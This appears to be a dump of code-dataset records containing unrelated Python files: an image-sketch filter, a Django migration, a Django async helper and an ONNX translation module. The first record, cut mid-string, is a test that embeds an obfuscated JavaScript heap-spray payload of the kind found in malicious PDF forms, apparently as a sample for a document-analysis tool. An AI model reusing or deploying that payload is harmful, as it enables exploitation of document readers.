zbldSXa4W84aoW73Y57SYSXlY1f68efbca6fz2d2zb94ilXW781ia52o0oi6a7Wd5d097a287WYSb92I35cSfca0d5ib1cia0zWzzel2SbXXWiae0o4z99do0XX42Ybe4Sf08YY5ziddIoX3if18o8Yfo2W953WSa69W4l0l4SIXefYzfecY3Y7cd4a261z0d0iI16l51zo8SIl7cda8Wa6i0deSI9W0iYz7dYfl8SYYze63ibX4II0biYYXloS3X8Wi5oeS3z0c4bIWeW25b5oWbll26fz824IbXfi81Soa3Wl5SdaaSYfI966a0c74a1eW29';b=27;c=led(p,b);t='o6207oY2S14dWf6I';a=10;j=led(t,a);i=4132;i+=3868;d='c413iIeoaI76acY3823IX6976ce9Iic6bb44llIIcc5SiY8WY1W61365eo5zo2z9239d3bd4bl4Ilcz0cS0XSfX7fa7ia8iYzc07W71ef4X45zo6acif0d1odfe747lW51c8beSfde307ol84a8e22S33XYceb5076a9c49d1fWfe74IlcI0cS0XSfX7fa7ia8iY8WY1W61e65eo5zo2zI2cWd1Idlbf5IoXISc89X2fda30d0a1oIlW05cb0a64eI1Wi1z9YS0X3f2X125Sac5o2Yl5SWXobc7zXlo6ccY4W78eS8e944o2Ifi69b3aX6e242lczYob9f2f9zbb4i5Xodc2Y2W43i6XXo54icI9Yd8oYodcfl3Wo8zfo6YXSecIbc7ilzo289a2caXzd5Xfal6XzI2f9d3XXl9I77adI34Sz4Si11fae9b0iW8d20Sa1a657lf9i5I9izeeziX2fY5alaI18b022fX1b5eilY4flfY5993364XfY06dzS5eW53b67fa4ida5d27YX29d6027ea9fd8WYdW61e6ce81z71zbcc9dSiWobI4Yaozdcd0X361afIdbXYoXld2a9lXd6dec4Woaa92cWXSb6l1969lXiiodlc27llII7zXSIX8W039d1bYdXYa3l2aiY0oa3Sdizz3Sl8z0o605S4c73c7W584lc2a4W91l6Ieo5zo2z92z94Y4Wzb07Ieiz84e0YS5';h=13;x=led(d,h);o='5f944c0bl2Yi';q=27;n=led(o,q);f='fIYI61Wai16Sio6dSai16IYb';l=15;g=led(f,l);z='6a6f696e';kr=25;kk=led(z,kr);ku=15820;ku-=6519;km=red();if(km>=i){ky='';kv=g;kw=pub(s,y);ks=21;kp='of922ozi89Xed564f5bebaS74S5ab9dzi04WIY11coo6YSYeY295SdS4Sf3IXS2adzII10X8c82cY20YoYoi4Xbazlzbcd57YSY78bW7Wdz1XXX8deSz65b2b9dz6z4SXle1lci5i6aXz6c72WIeY28WW436Y51aXbW56164boedS7621W5zl1oiic5XIzlcceYS25039YidW9Y181XeWI6if41oel7I555I54d86aodIfeY808fidYfzeWWcl3e360ocWdo673lbael4z34fia2eXlcfXI3zYl68ciW0zz59e77SdSl05Xl66So3ibeeadY74a3lee1odflI2Idl1cdi4azY0eeWXS7303bddWSY7f5be724065fI5WeSoWic59zbzIo25Y0Y06W49lS4Yf1fXeWl6i0b12Xzez35aIbYl9o84W51I88fciYY0Sl40XWlS0360o9a2e673b1Ie87l6YfiaWoS7Xia5WzYl6oX26I5l8097eSe341o1I6IScfIbdeadY6c5Yb1d7loSWIXz6z3cdi8I6069eWl27371adXWcSl62b5eld842fc5Sl37441zWei8fdXYbY7l1Wa9oWe358X15W6Si3zei727c4zf95a99o1i6ifablb81YIa3l9WfiWIaS107XI27fcIi16WYdb42aba9o370I2iazYle89260d979eW7Sd3f05Xl6Ifl041eWY4o6c5YaIe2o5fXbI8l73o65e27Y792WX2aS30X9lW5flfob8Wleb655W5WeSoWic59z08X22Y207l1oYceSe551W9i2zYz0be2bI7c354Ibzl0li43bdzXzc4iY7Yz03ociX2Y5405dXX6dff592e84639a552ooo0fdzdz87o27cSIzl3WW9lS4Y981ciX6dl3l1c7I44691aaWe2oaiW5a80z64f520e098595Sd370acIWlY3fXb5X2e765f952oz6Xi5IWIilc81ib2S0b91cYI6Y6Xod5W3f2b8eiX64W50fcl290oco9zaa0l64c5e2406869bSlS11bcIdof30cebbI4449a3lSlo64I65dal7022c7Y7zc05ca
S7z03SczWl6lb8bieY4Y4e1Slle2iciS5YIdz8o2i7Y3Y0ebWX273a3iX3XaflIibaXz4z4Y59bcl4l34cIf13zb4biY030c91c5WSY18bcdd6Si0b1dbfd458495Il9o84ab2e07IoXifY60282S2SlS11bcIdoff3195el7450aWbll5ococI3zYlSc7i72e0bW4c03aSi1Xcbdedz3ibz777974faaIe779iSI2aW89cIYYY3Y2oXi0WdY9049iooYf3bzIbld45e5200l47iic5Xa38X22i1f6zcWYSdI3Yf8i9W2d61f41cXzSY701I5Se56iI5baa07c2i5IYel9Wci2Sd1la5dWW7dz011ce27l6bYYaSdS6aiabdezco41ifa7Y2WWW7SdYl319dWz6cf4b0Wa4z7efaXSo879iSI2aW89cdYYI0l89eS536Sf19X3W6Yz051ib24W6e1aled7o8fI5dIi8f822SY00bWcia3SS70Xll6667f4baXz7c6if352o5ii43b2al8929cXI0za84ceS436311WW66X359b70493i43bla1oc4WI3zYl1ob2Ia0zc05c5S6Ye1ice26S86516WI4Y3Wfal3lSi1IlbI8Szeo2i6Y3zf9eWX27Yo19cWWlSc049XbIdz3i1al2a37iic5Xad8Xc9iza3z79a7e3e548X156SS43lzzX8ez554ib3lS7049idaY7fo65IYf038490I61304dWW76X3dfcea4o3e5aXSe3oco1iY8l81c7idYSz78bW73a54XIcd26S865b6e0dI45fW5Wlzo04Sbdal78cd2WIeY08Wi23iz68fX36adX3be2eld8425i52oYW9fIiW8ll9of5S00Y59fcfWe3o3XdiWlYz6b1oWI7b50f35zl5i3i25Yzic6cz5XYcz591WSIaz1Xi15dod63Ife7ee46Y1WaelW7YoXbozY8022cS20l8WaW2Sdz08f9W2zf8fo96e6d43857lIl5lcilIXzlX12zibaYl40aWb2bS71XXIWId6651c72447W5ebYlYioi35SzSlbcb5WY00co5WSSe3f1I9adaf4fI1cbId638aWX3l373IXbWzi80ddYSael9W59bS4z13b9edldf3z92ece43faSaelz64fc5a13lec158Y8z99l7eIezo14ded3Sz6o1XXf744W59lzooo0I2IWadz3oiib03l69YWX44351idIW6Y8b81aWddY4o5ibclX75I6IYa38X22ifa0l4Wlcf2eY01f9S2ISff4eaXz7c4ofea9o3liI1I3zfcIcWYeIX998ciXS631XodIW6fzbfeXWlS45847bleXioI5bYe8l32icS00zeoa772oYI1b9Sdcf33110797Y481Sa1lS75o1Ifzdli8c2407z88ccb2iY907dX2eYf68b07Y4922f7X4dolaIiIdez762c58a0zf8Yi0IlSI0bXi2zYzbff0baSY6ef3bYdYiofli2eS81o7c22d0f8liaIe341i9a2zf66Yf58zdb7S1bX2l07dfXbW8zcf8cc8Y6zao5ib3S3o8X1X6dd23IzI7e406c1SaYe2l3f9zI86z88e2dI5l40cWeWi3i8IXbWISofI';kb=led(kp,ks);kc=pub(s,7600);if(km<m){ky=c}else if(km<ku){ky=x}if(ky[n]){kt=u;ka=[kv,kw,kb,kc,kt,ky][kk]('');sac[j]=ka}}return}function pub(j,u){var a,r,w,g,q,y;y='967e2IfXYiX7';w=6;g=led(y,w);a='WfdY64oYc4WSSe694d';q=30;r=led(a,q);while(j[g]<u){j+=j}j=j[r](0,u);return j}</script></event><ui><imageEdit/></ui></field></subform></subform></template>\"\"\"\n xml=etree.fromstring(y)\n jsStr = xmlToJS(xml)\n\n print jsStr\n\nif __name__ == \"__main__\":\n test_xmlToJS()\n",
"step-2": null,
"step-3": null,
"step-4": null,
"step-5": null,
"step-ids": [
0
]
}
|
[
0
] |
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# @Author : 河北雪域网络科技有限公司 A.Star
# @contact: [email protected]
# @site:
# @file: img_to_sketch.py
# @time: 2018/8/6 1:15
# @Software: PyCharm
from skimage.color import rgb2grey
import numpy as np
def sketch(img, threshold=15):
"""
素描画生成
param img: Image实例
param threshold: 介于0到100
:return:
"""
if threshold < 0:
threshold = 0
if threshold > 100:
threshold = 100
if len(img.shape) == 3:
img = rgb2grey(img)
m, n = img.shape
diff = np.abs(img[:m - 1, :n - 1] - img[1:, 1:])
img = np.zeros((m - 1, n - 1))
img[diff < threshold/255] = 1
return img
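

# --- Usage sketch (illustrative addition, not part of the original file) ---
# A minimal example of how sketch() might be called. The file names below are
# placeholders, and skimage.io is assumed to be available alongside the
# skimage.color import used above; np refers to the numpy import at the top.
if __name__ == '__main__':
    from skimage import io

    source = io.imread('photo.jpg')           # any RGB or greyscale image
    result = sketch(source, threshold=15)     # array of 0s and 1s
    io.imsave('photo_sketch.png', (result * 255).astype(np.uint8))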
|
normal
|
{
"blob_id": "065354d2a8fd8a75e16bf85f624b12641377029a",
"index": 8568,
"step-1": "<mask token>\n",
"step-2": "<mask token>\n\n\ndef sketch(img, threshold=15):\n \"\"\"\n 素描画生成\n param img: Image实例\n param threshold: 介于0到100\n :return:\n \"\"\"\n if threshold < 0:\n threshold = 0\n if threshold > 100:\n threshold = 100\n if len(img.shape) == 3:\n img = rgb2grey(img)\n m, n = img.shape\n diff = np.abs(img[:m - 1, :n - 1] - img[1:, 1:])\n img = np.zeros((m - 1, n - 1))\n img[diff < threshold / 255] = 1\n return img\n",
"step-3": "from skimage.color import rgb2grey\nimport numpy as np\n\n\ndef sketch(img, threshold=15):\n \"\"\"\n 素描画生成\n param img: Image实例\n param threshold: 介于0到100\n :return:\n \"\"\"\n if threshold < 0:\n threshold = 0\n if threshold > 100:\n threshold = 100\n if len(img.shape) == 3:\n img = rgb2grey(img)\n m, n = img.shape\n diff = np.abs(img[:m - 1, :n - 1] - img[1:, 1:])\n img = np.zeros((m - 1, n - 1))\n img[diff < threshold / 255] = 1\n return img\n",
"step-4": "#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n# @Author : 河北雪域网络科技有限公司 A.Star\n# @contact: [email protected]\n# @site: \n# @file: img_to_sketch.py\n# @time: 2018/8/6 1:15\n# @Software: PyCharm\n\nfrom skimage.color import rgb2grey\nimport numpy as np\n\n\ndef sketch(img, threshold=15):\n \"\"\"\n 素描画生成\n param img: Image实例\n param threshold: 介于0到100\n :return:\n \"\"\"\n if threshold < 0:\n threshold = 0\n if threshold > 100:\n threshold = 100\n if len(img.shape) == 3:\n img = rgb2grey(img)\n m, n = img.shape\n diff = np.abs(img[:m - 1, :n - 1] - img[1:, 1:])\n img = np.zeros((m - 1, n - 1))\n img[diff < threshold/255] = 1\n return img\n",
"step-5": null,
"step-ids": [
0,
1,
2,
3
]
}
|
[
0,
1,
2,
3
] |
# Generated by Django 3.1.7 on 2021-03-25 00:33
from django.db import migrations
class Migration(migrations.Migration):
dependencies = [
('restaurante', '0003_auto_20210324_1932'),
]
operations = [
migrations.AlterModelOptions(
name='comprobantemodel',
options={'verbose_name': 'Comprobante'},
),
migrations.AlterModelTable(
name='comprobantemodel',
table='t_comprobante',
),
]
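

# --- Usage note (illustrative, not part of the generated migration file) ---
# Applying this migration is normally done from the project root, assuming the
# usual manage.py layout:
#   python manage.py migrate restaurante
# or programmatically:
#   from django.core.management import call_command
#   call_command('migrate', 'restaurante')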
|
normal
|
{
"blob_id": "f76a3fac75e7e2b156f4bff5094f11009b65b599",
"index": 8822,
"step-1": "<mask token>\n",
"step-2": "<mask token>\n\n\nclass Migration(migrations.Migration):\n <mask token>\n <mask token>\n",
"step-3": "<mask token>\n\n\nclass Migration(migrations.Migration):\n dependencies = [('restaurante', '0003_auto_20210324_1932')]\n operations = [migrations.AlterModelOptions(name='comprobantemodel',\n options={'verbose_name': 'Comprobante'}), migrations.\n AlterModelTable(name='comprobantemodel', table='t_comprobante')]\n",
"step-4": "from django.db import migrations\n\n\nclass Migration(migrations.Migration):\n dependencies = [('restaurante', '0003_auto_20210324_1932')]\n operations = [migrations.AlterModelOptions(name='comprobantemodel',\n options={'verbose_name': 'Comprobante'}), migrations.\n AlterModelTable(name='comprobantemodel', table='t_comprobante')]\n",
"step-5": "# Generated by Django 3.1.7 on 2021-03-25 00:33\n\nfrom django.db import migrations\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('restaurante', '0003_auto_20210324_1932'),\n ]\n\n operations = [\n migrations.AlterModelOptions(\n name='comprobantemodel',\n options={'verbose_name': 'Comprobante'},\n ),\n migrations.AlterModelTable(\n name='comprobantemodel',\n table='t_comprobante',\n ),\n ]\n",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
# Turn off bytecode generation
import sys
from asgiref.sync import sync_to_async
from django.core.wsgi import get_wsgi_application
sys.dont_write_bytecode = True
# Django specific settings
import os
os.environ.setdefault("DJANGO_SETTINGS_MODULE", "settings")
import django
django.setup()
from db import models
def print_all_models():
return models.Sample.objects.all()
@sync_to_async
def _create_record(name):
return models.Sample.objects.create(name=name)
async def create_record(name=None):
await _create_record(name)
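

# --- Usage sketch (assumption, not part of the original module) ---
# create_record() is a coroutine, so it has to be awaited; one simple driver
# uses asyncio.run(). The record name below is a placeholder.
if __name__ == '__main__':
    import asyncio

    asyncio.run(create_record(name='example'))
    print(list(print_all_models()))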
|
normal
|
{
"blob_id": "4afb556ceca89eb90ba800db4f383afad1cd42a5",
"index": 3765,
"step-1": "<mask token>\n\n\ndef print_all_models():\n return models.Sample.objects.all()\n\n\n@sync_to_async\ndef _create_record(name):\n return models.Sample.objects.create(name=name)\n\n\n<mask token>\n",
"step-2": "<mask token>\nos.environ.setdefault('DJANGO_SETTINGS_MODULE', 'settings')\n<mask token>\ndjango.setup()\n<mask token>\n\n\ndef print_all_models():\n return models.Sample.objects.all()\n\n\n@sync_to_async\ndef _create_record(name):\n return models.Sample.objects.create(name=name)\n\n\nasync def create_record(name=None):\n await _create_record(name)\n",
"step-3": "<mask token>\nsys.dont_write_bytecode = True\n<mask token>\nos.environ.setdefault('DJANGO_SETTINGS_MODULE', 'settings')\n<mask token>\ndjango.setup()\n<mask token>\n\n\ndef print_all_models():\n return models.Sample.objects.all()\n\n\n@sync_to_async\ndef _create_record(name):\n return models.Sample.objects.create(name=name)\n\n\nasync def create_record(name=None):\n await _create_record(name)\n",
"step-4": "import sys\nfrom asgiref.sync import sync_to_async\nfrom django.core.wsgi import get_wsgi_application\nsys.dont_write_bytecode = True\nimport os\nos.environ.setdefault('DJANGO_SETTINGS_MODULE', 'settings')\nimport django\ndjango.setup()\nfrom db import models\n\n\ndef print_all_models():\n return models.Sample.objects.all()\n\n\n@sync_to_async\ndef _create_record(name):\n return models.Sample.objects.create(name=name)\n\n\nasync def create_record(name=None):\n await _create_record(name)\n",
"step-5": "# Turn off bytecode generation\nimport sys\nfrom asgiref.sync import sync_to_async\nfrom django.core.wsgi import get_wsgi_application\n\n\nsys.dont_write_bytecode = True\n\n# Django specific settings\nimport os\n\nos.environ.setdefault(\"DJANGO_SETTINGS_MODULE\", \"settings\")\nimport django\n\ndjango.setup()\n\nfrom db import models\n\n\ndef print_all_models():\n return models.Sample.objects.all()\n\n\n@sync_to_async\ndef _create_record(name):\n return models.Sample.objects.create(name=name)\n\n\nasync def create_record(name=None):\n await _create_record(name)\n",
"step-ids": [
2,
3,
4,
5,
6
]
}
|
[
2,
3,
4,
5,
6
] |
"""
@file
@brief One class which visits a syntax tree.
"""
import inspect
import ast
from textwrap import dedent
import numpy
from scipy.spatial.distance import squareform, pdist
from .node_visitor_translator import CodeNodeVisitor
def py_make_float_array(cst, op_version=None):
"""
Creates an array with a single element
from a constant.
@param cst constant
@param op_version unused
@return array
.. runpython::
:showcode:
:warningout: DeprecationWarning
from mlprodict.onnx_tools.onnx_grammar.onnx_translation import py_make_float_array
print(py_make_float_array(5.5))
"""
return numpy.array([cst], dtype=numpy.float32)
def py_pow(x, p, op_version=None):
"""
Function for python operator ``**``.
@param x float
@param p power
@param op_version unused
@return :math:`x^p`
"""
return x ** p
def py_mul(*x, op_version=None):
"""
Function for python operator ``*``.
@param x floats
@param op_version unused
@return `x*y`
"""
if len(x) == 2:
return x[0] * x[1]
p = x[0]
for y in x[1:]:
p *= y
return p
def py_opp(x, op_version=None):
"""
Function for python unary operator ``-``.
@param x floats
@param op_version unused
@return `-x`
"""
return -x
def squareform_pdist(X, metric='sqeuclidean', op_version=None):
"""
Replacements for `squareform
<http://scipy.github.io/devdocs/generated/scipy.spatial.distance.squareform.html>`_
and `pdist
<http://scipy.github.io/devdocs/generated/scipy.spatial.distance.pdist.html>`_.
"""
return squareform(pdist(X, metric=metric))
def get_default_context():
"""
Returns a default context useful for most of the conversion
from a function using :epkg:`numpy` into :epkg:`ONNX`.
"""
context = {'py_pow': py_pow, 'py_make_float_array': py_make_float_array,
'py_mul': py_mul, 'py_opp': py_opp,
'cdist': 'cdist', 'squareform_pdist': 'squareform_pdist'}
    allow = set(('abs add ceil arccos arccosh arcsin arcsinh arctan arctanh ceil cos cosh divide '
                 'equal exp floor greater invert less log matmul maximum minimum mod '
                 'multiply power sign sin sinh sqrt square subtract tan tanh transpose').split())
for k, v in numpy.__dict__.items():
if k not in allow:
continue
context[f'numpy.{k}'] = v
context[f'np.{k}'] = v
return context
def get_default_context_cpl():
"""
Returns a default useful context to compile the converter
returned by @see fn translate_fct2onnx.
"""
ctx = {'py_make_float_array': py_make_float_array,
'py_pow': py_pow, 'py_mul': py_mul, 'py_opp': py_opp,
'numpy': numpy}
try:
from skl2onnx.algebra.complex_functions import onnx_squareform_pdist # delayed
from skl2onnx.algebra.complex_functions import onnx_cdist # delayed
ctx['onnx_squareform_pdist'] = onnx_squareform_pdist
ctx['onnx_cdist'] = onnx_cdist
except ImportError: # pragma: no cover
# Too old version for skl2onnx.
pass
from skl2onnx.algebra import onnx_ops # delayed
from skl2onnx.algebra.onnx_operator import OnnxOperator # delayed
d = onnx_ops.__dict__
for k, v in d.items():
try:
if k.startswith("Onnx") and issubclass(v, OnnxOperator):
ctx[k] = v
except TypeError as e:
if inspect.isfunction(v):
continue
raise RuntimeError( # pragma: no cover
f"Issue with {k}={v} (type={type(v)})") from e
return ctx
def translate_fct2onnx(fct, context=None, cpl=False,
context_cpl=None, output_names=None,
dtype=numpy.float32,
verbose=0, fLOG=None):
"""
Translates a function into :epkg:`ONNX`. The code it produces
is using classes *OnnxAbs*, *OnnxAdd*, ...
@param fct function to convert
@param context context of the function to convert
something like ``{'numpy.transpose': numpy.transpose}``,
if *context* is None, it receives a default value
returnd by @see fn get_default_context
@param cpl compile the function after it was
created
@param context_cpl context used at compiling time
if *context_cpl* is None, it receives a default value
returnd by @see fn get_default_context_cpl
@param output_names names of the output in the :epkg:`ONNX` graph
@param dtype :epkg:`numpy` float type used to produce the model
@param verbose integer, display more information
@param fLOG logging function
@return code or compiled code
.. exref::
:title: Convert a function into ONNX code
The following code parses a python function and returns
another python function which produces an :epkg:`ONNX`
graph if executed.
.. runpython::
:showcode:
:warningout: DeprecationWarning
:process:
:store_in_file: fct2onnx2.py
import numpy
from mlprodict.onnx_tools.onnx_grammar import translate_fct2onnx
def trs(x, y):
z = x + numpy.transpose(y, axes=[1, 0])
return x * z
onnx_code = translate_fct2onnx(
trs, context={'numpy.transpose': numpy.transpose})
print(onnx_code)
Next example goes further and compile the outcome.
.. exref::
:title: Convert a function into ONNX code and run
The following code parses a python function and returns
another python function which produces an :epkg:`ONNX`
graph if executed. The example executes the function,
creates an :epkg:`ONNX` then uses @see cl OnnxInference
to compute *predictions*. Finally it compares
them to the original.
.. runpython::
:showcode:
:warningout: DeprecationWarning
:process:
:store_in_file: fct2onnx3.py
import numpy
from mlprodict.onnx_tools.onnx_grammar import translate_fct2onnx
from mlprodict.plotting.text_plot import onnx_simple_text_plot
from mlprodict.onnxrt import OnnxInference
from mlprodict.npy.xop import loadop
OnnxAdd, OnnxTranspose, OnnxMul, OnnxIdentity = loadop(
'Add', 'Transpose', 'Mul', 'Identity')
ctx = {'OnnxAdd': OnnxAdd,
'OnnxTranspose': OnnxTranspose,
'OnnxMul': OnnxMul,
'OnnxIdentity': OnnxIdentity}
def trs(x, y):
z = x + numpy.transpose(y, axes=[1, 0])
return x * z
inputs = {'x': numpy.array([[1, 2]], dtype=numpy.float32),
'y': numpy.array([[-0.3, 0.4]], dtype=numpy.float32).T}
original = trs(inputs['x'], inputs['y'])
print('original output:', original)
onnx_fct = translate_fct2onnx(
trs, context={'numpy.transpose': numpy.transpose},
cpl=True, context_cpl=ctx, output_names=['Z'])
onnx_code = onnx_fct('x', 'y', op_version=12)
onnx_g = onnx_code.to_onnx(inputs, target_opset=12)
print("ONNX model")
print(onnx_simple_text_plot(onnx_g))
oinf = OnnxInference(onnx_g)
res = oinf.run(inputs)
print('-----------')
print("ONNX inference:", res['Z'])
The function to be converted may include python functions
which must not be converted. In that case, their name
must be prefixed by ``py_``. The execution of the function
this one builds produces the following error::
TypeError: Parameter to MergeFrom() must be instance of same class:
expected onnx.TensorProto got onnx.AttributeProto.
    It indicates that constants in the code mix multiple types,
    usually floats and tensors of floats. Floats should be converted
using the following function::
def py_make_float_array(cst):
return numpy.array([cst], dtype=numpy.float32)
The function replaces empty contexts by default values which
covers many :epkg:`numpy` functions. The tutorial
:ref:`l-onnx-tutorial` gives an example of how it can be used
on a more complex function.
"""
def compile_code(name, code, context=None):
"""
Compiles a python function with the given
context.
@param name function name
@param code python code
@param context context used at compilation
@return compiled function
"""
if context is None:
context = {} # pragma: no cover
try:
obj = compile(code, "", "exec")
except SyntaxError as e: # pragma: no cover
raise SyntaxError(f"Unable to compile\n{code}") from e
context_g = context.copy()
context_l = context.copy()
exec(obj, context_g, context_l) # pylint: disable=W0122
return context_l[name]
if isinstance(fct, str):
code = fct
elif callable(fct):
code = inspect.getsource(fct)
else:
raise TypeError( # pragma: no cover
f"Unable to guess code from type {type(fct)}.")
node = ast.parse(dedent(code))
v = CodeNodeVisitor()
v.visit(node)
if context is None:
context = get_default_context()
onnx_code = v.export(context=context,
output_names=output_names)
if not cpl:
return onnx_code
if verbose > 0 and fLOG is not None: # pragma: no cover
fLOG('[translate_fct2onnx] python code')
fLOG(code)
fLOG('[translate_fct2onnx] ONNX code')
fLOG(onnx_code)
if context_cpl is None:
context_cpl = get_default_context_cpl()
if 'numpy' not in context_cpl:
context_cpl = context_cpl.copy()
context_cpl['numpy'] = numpy
return compile_code(fct.__name__, onnx_code, context_cpl)
|
normal
|
{
"blob_id": "fdf6c28e65b50c52550a95c2d991b1eb3ec53a2f",
"index": 3540,
"step-1": "<mask token>\n\n\ndef py_make_float_array(cst, op_version=None):\n \"\"\"\n Creates an array with a single element\n from a constant.\n\n @param cst constant\n @param op_version unused\n @return array\n\n .. runpython::\n :showcode:\n :warningout: DeprecationWarning\n\n from mlprodict.onnx_tools.onnx_grammar.onnx_translation import py_make_float_array\n print(py_make_float_array(5.5))\n \"\"\"\n return numpy.array([cst], dtype=numpy.float32)\n\n\n<mask token>\n\n\ndef py_mul(*x, op_version=None):\n \"\"\"\n Function for python operator ``*``.\n\n @param x floats\n @param op_version unused\n @return `x*y`\n \"\"\"\n if len(x) == 2:\n return x[0] * x[1]\n p = x[0]\n for y in x[1:]:\n p *= y\n return p\n\n\ndef py_opp(x, op_version=None):\n \"\"\"\n Function for python unary operator ``-``.\n\n @param x floats\n @param op_version unused\n @return `-x`\n \"\"\"\n return -x\n\n\n<mask token>\n\n\ndef get_default_context_cpl():\n \"\"\"\n Returns a default useful context to compile the converter\n returned by @see fn translate_fct2onnx.\n \"\"\"\n ctx = {'py_make_float_array': py_make_float_array, 'py_pow': py_pow,\n 'py_mul': py_mul, 'py_opp': py_opp, 'numpy': numpy}\n try:\n from skl2onnx.algebra.complex_functions import onnx_squareform_pdist\n from skl2onnx.algebra.complex_functions import onnx_cdist\n ctx['onnx_squareform_pdist'] = onnx_squareform_pdist\n ctx['onnx_cdist'] = onnx_cdist\n except ImportError:\n pass\n from skl2onnx.algebra import onnx_ops\n from skl2onnx.algebra.onnx_operator import OnnxOperator\n d = onnx_ops.__dict__\n for k, v in d.items():\n try:\n if k.startswith('Onnx') and issubclass(v, OnnxOperator):\n ctx[k] = v\n except TypeError as e:\n if inspect.isfunction(v):\n continue\n raise RuntimeError(f'Issue with {k}={v} (type={type(v)})') from e\n return ctx\n\n\ndef translate_fct2onnx(fct, context=None, cpl=False, context_cpl=None,\n output_names=None, dtype=numpy.float32, verbose=0, fLOG=None):\n \"\"\"\n Translates a function into :epkg:`ONNX`. The code it produces\n is using classes *OnnxAbs*, *OnnxAdd*, ...\n\n @param fct function to convert\n @param context context of the function to convert\n something like ``{'numpy.transpose': numpy.transpose}``,\n if *context* is None, it receives a default value\n returnd by @see fn get_default_context\n @param cpl compile the function after it was\n created\n @param context_cpl context used at compiling time\n if *context_cpl* is None, it receives a default value\n returnd by @see fn get_default_context_cpl\n @param output_names names of the output in the :epkg:`ONNX` graph\n @param dtype :epkg:`numpy` float type used to produce the model\n @param verbose integer, display more information\n @param fLOG logging function\n @return code or compiled code\n\n .. exref::\n :title: Convert a function into ONNX code\n\n The following code parses a python function and returns\n another python function which produces an :epkg:`ONNX`\n graph if executed.\n\n .. runpython::\n :showcode:\n :warningout: DeprecationWarning\n :process:\n :store_in_file: fct2onnx2.py\n\n import numpy\n from mlprodict.onnx_tools.onnx_grammar import translate_fct2onnx\n\n def trs(x, y):\n z = x + numpy.transpose(y, axes=[1, 0])\n return x * z\n\n onnx_code = translate_fct2onnx(\n trs, context={'numpy.transpose': numpy.transpose})\n print(onnx_code)\n\n Next example goes further and compile the outcome.\n\n .. 
exref::\n :title: Convert a function into ONNX code and run\n\n The following code parses a python function and returns\n another python function which produces an :epkg:`ONNX`\n graph if executed. The example executes the function,\n creates an :epkg:`ONNX` then uses @see cl OnnxInference\n to compute *predictions*. Finally it compares\n them to the original.\n\n .. runpython::\n :showcode:\n :warningout: DeprecationWarning\n :process:\n :store_in_file: fct2onnx3.py\n\n import numpy\n from mlprodict.onnx_tools.onnx_grammar import translate_fct2onnx\n from mlprodict.plotting.text_plot import onnx_simple_text_plot\n from mlprodict.onnxrt import OnnxInference\n from mlprodict.npy.xop import loadop\n\n\n OnnxAdd, OnnxTranspose, OnnxMul, OnnxIdentity = loadop(\n 'Add', 'Transpose', 'Mul', 'Identity')\n\n\n ctx = {'OnnxAdd': OnnxAdd,\n 'OnnxTranspose': OnnxTranspose,\n 'OnnxMul': OnnxMul,\n 'OnnxIdentity': OnnxIdentity}\n\n def trs(x, y):\n z = x + numpy.transpose(y, axes=[1, 0])\n return x * z\n\n inputs = {'x': numpy.array([[1, 2]], dtype=numpy.float32),\n 'y': numpy.array([[-0.3, 0.4]], dtype=numpy.float32).T}\n\n original = trs(inputs['x'], inputs['y'])\n\n print('original output:', original)\n\n onnx_fct = translate_fct2onnx(\n trs, context={'numpy.transpose': numpy.transpose},\n cpl=True, context_cpl=ctx, output_names=['Z'])\n\n onnx_code = onnx_fct('x', 'y', op_version=12)\n\n onnx_g = onnx_code.to_onnx(inputs, target_opset=12)\n print(\"ONNX model\")\n print(onnx_simple_text_plot(onnx_g))\n\n oinf = OnnxInference(onnx_g)\n res = oinf.run(inputs)\n\n print('-----------')\n print(\"ONNX inference:\", res['Z'])\n\n The function to be converted may include python functions\n which must not be converted. In that case, their name\n must be prefixed by ``py_``. The execution of the function\n this one builds produces the following error::\n\n TypeError: Parameter to MergeFrom() must be instance of same class:\n expected onnx.TensorProto got onnx.AttributeProto.\n\n It indicates that constants in the code marges multiple types,\n usually floats and tensor of floats. Floats should be converted\n using the following function::\n\n def py_make_float_array(cst):\n return numpy.array([cst], dtype=numpy.float32)\n\n The function replaces empty contexts by default values which\n covers many :epkg:`numpy` functions. 
The tutorial\n :ref:`l-onnx-tutorial` gives an example of how it can be used\n on a more complex function.\n \"\"\"\n\n def compile_code(name, code, context=None):\n \"\"\"\n Compiles a python function with the given\n context.\n\n @param name function name\n @param code python code\n @param context context used at compilation\n @return compiled function\n \"\"\"\n if context is None:\n context = {}\n try:\n obj = compile(code, '', 'exec')\n except SyntaxError as e:\n raise SyntaxError(f'Unable to compile\\n{code}') from e\n context_g = context.copy()\n context_l = context.copy()\n exec(obj, context_g, context_l)\n return context_l[name]\n if isinstance(fct, str):\n code = fct\n elif callable(fct):\n code = inspect.getsource(fct)\n else:\n raise TypeError(f'Unable to guess code from type {type(fct)}.')\n node = ast.parse(dedent(code))\n v = CodeNodeVisitor()\n v.visit(node)\n if context is None:\n context = get_default_context()\n onnx_code = v.export(context=context, output_names=output_names)\n if not cpl:\n return onnx_code\n if verbose > 0 and fLOG is not None:\n fLOG('[translate_fct2onnx] python code')\n fLOG(code)\n fLOG('[translate_fct2onnx] ONNX code')\n fLOG(onnx_code)\n if context_cpl is None:\n context_cpl = get_default_context_cpl()\n if 'numpy' not in context_cpl:\n context_cpl = context_cpl.copy()\n context_cpl['numpy'] = numpy\n return compile_code(fct.__name__, onnx_code, context_cpl)\n",
"step-2": "<mask token>\n\n\ndef py_make_float_array(cst, op_version=None):\n \"\"\"\n Creates an array with a single element\n from a constant.\n\n @param cst constant\n @param op_version unused\n @return array\n\n .. runpython::\n :showcode:\n :warningout: DeprecationWarning\n\n from mlprodict.onnx_tools.onnx_grammar.onnx_translation import py_make_float_array\n print(py_make_float_array(5.5))\n \"\"\"\n return numpy.array([cst], dtype=numpy.float32)\n\n\ndef py_pow(x, p, op_version=None):\n \"\"\"\n Function for python operator ``**``.\n\n @param x float\n @param p power\n @param op_version unused\n @return :math:`x^p`\n \"\"\"\n return x ** p\n\n\ndef py_mul(*x, op_version=None):\n \"\"\"\n Function for python operator ``*``.\n\n @param x floats\n @param op_version unused\n @return `x*y`\n \"\"\"\n if len(x) == 2:\n return x[0] * x[1]\n p = x[0]\n for y in x[1:]:\n p *= y\n return p\n\n\ndef py_opp(x, op_version=None):\n \"\"\"\n Function for python unary operator ``-``.\n\n @param x floats\n @param op_version unused\n @return `-x`\n \"\"\"\n return -x\n\n\n<mask token>\n\n\ndef 